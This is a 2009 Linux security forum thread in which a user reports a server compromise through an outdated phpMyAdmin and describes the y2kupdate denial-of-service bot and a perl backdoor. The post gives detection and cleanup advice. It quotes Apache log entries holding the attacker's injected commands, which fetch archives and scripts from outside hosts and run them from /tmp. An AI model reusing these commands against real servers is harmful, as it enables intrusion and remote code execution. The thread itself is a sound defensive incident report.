LinuxQuestions.org
Visit the LQ Articles and Editorials section
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices



Reply
 
Search this Thread
Old 11-15-2009, 02:46 AM   #1
Protector
LQ Newbie
 
Registered: Nov 2009
Posts: 2

Rep: Reputation: 0
y2kupdate denial of service vulnerability


I am posting here to warn others about y2kupdate.

I have experienced two denial of service attacks in the last two weeks as a result of this "application" and wished to warn others.

The entry point to install the software on the Linux servers was a vulnerabilty in an out of date version of phpMyAdmin.

The apache access_log entry which shows the initial infection taking place is shown below:

GET /admin/config/config.inc.php?c=uname%20-a
GET /admin/config/config.inc.php?c=cd%20/tmp;wget%20http://212.144.252.5/bh.tgz;tar%20xvf%20bh.tgz;rm%20-fr%20bh.tgz;cd%20.pid;./init;./fuck

An analysis of the last line of the above log entry reveals:

1) Vulnerability in phpMyAdmin exploited via /admin/config/config.inc.php
2) wget used to fetch bh.tgz into /tmp directory
3) bh.tgz unpacked into /tmp/.pid driectory and source archive deleted
4) init executable run from /tmp/.pid
5) f*** script run from /tmp/.pid

The init executable appears, amongst other things, to start a proxy server. This displaces httpd and listens on ports 80 and 443. The sign of this is that using the command netstat -lnpt shows that ports 80 and 443 are held open by the init or cron processes instead of httpd. Despite this the Web content on the server is available as normal, until an external trigger? puts init (or std?) into attack mode. At this point the server goes to 100% CPU time and spends it's whole time pushing out dos packets onto the intranet and internet. The only effective way of stopping this appears to be to reboot the server, at which point apache httpd takes back control of ports 80 and 443.

The f*** shell script starts a once a minute cron job as user apache, which calls the y2kupdate application. I have not yet worked out what this may be doing, although I suspect it may be trying to communicate with other servers over the Internet as there is a file called bang.txt in the .pid folder that contains a list of around 15K IP addresses. The easiest way to stop y2kupdate is to erase the apache cron job.

The above applications can be installed into three possible locations, /tmp, /var/tmp & /dev/shm and these should be checked for suspicious hidden directories/files. Once found it is important to delete the suspicious items.

It is also important to change the permissions (chmod 750) on /usr/bin/wget, /usr/bin/lwp-download and /usr/bin/curl so they can only be used by root to fetch files off the Internet. This is a precautionary measure as once someone has obtained access to a server via a PHP or Perl backdoor these three commands seem to be the main way of downloading unwanted applications.

Also of course it is vitally important to download the latest version of phpMyAdmin to close the vulnerability down.

Additionally there appears to be a second class of application that can expliot the phpMyAdmin vulnerability. This is a perl script, which goes by various names, including ize. This appears to allow a remote user shell command line access to the server as user Apache. Once again it can be found in /tmp, /var/tmp or /dev/shm.

An Apache log entry which shows this type of backdoor exploit is shown below:

GET /admin/config/config.inc.php?c=cd+/tmp;wget+sportblad.com/b.txt;perl+b.txt;rm+rf-+b.txt

For more information on these vulnerabilities please visit: http://www.securityfocus.com/infocus/1871

Last edited by Protector; 11-17-2009 at 05:43 AM. Reason: Update of posting
 
Old 11-15-2009, 03:44 AM   #2
win32sux
Guru
 
Registered: Jul 2003
Location: Los Angeles
Distribution: Ubuntu
Posts: 9,870

Rep: Reputation: 371Reputation: 371Reputation: 371Reputation: 371
I've moved your post from where you originally posted to its own thread (please don't resurrect dead threads).
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
ISC BIND 9 Denial of Service Vulnerability win32sux Linux - Security 2 08-04-2009 04:17 PM
Troubleshooting Denial of Service vbsaltydog Linux - General 4 07-25-2008 12:51 AM
how to disable TCP/IP Denial of Service mayankh Linux - Security 2 10-14-2006 05:01 AM
Denial Of Service Attacks Ozzman Mandriva 13 11-13-2003 01:59 AM
ways to protect against denial of service attacks. sundarrnathan Linux - Security 1 06-01-2003 01:58 PM


All times are GMT -5. The time now is 12:23 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration